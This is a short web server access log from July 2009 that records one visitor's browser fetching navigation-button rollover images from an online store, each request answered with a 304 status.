83.132.125.167 - - [10/Jul/2009:04:37:40 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L114514480E74A600C01107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [10/Jul/2009:04:37:40 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L114514480E74A600C01107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [10/Jul/2009:04:37:40 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L114514480E74A600C01107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [10/Jul/2009:04:37:41 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L114514480E74A600C01107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [10/Jul/2009:04:37:41 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L114514480E74A600C01107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
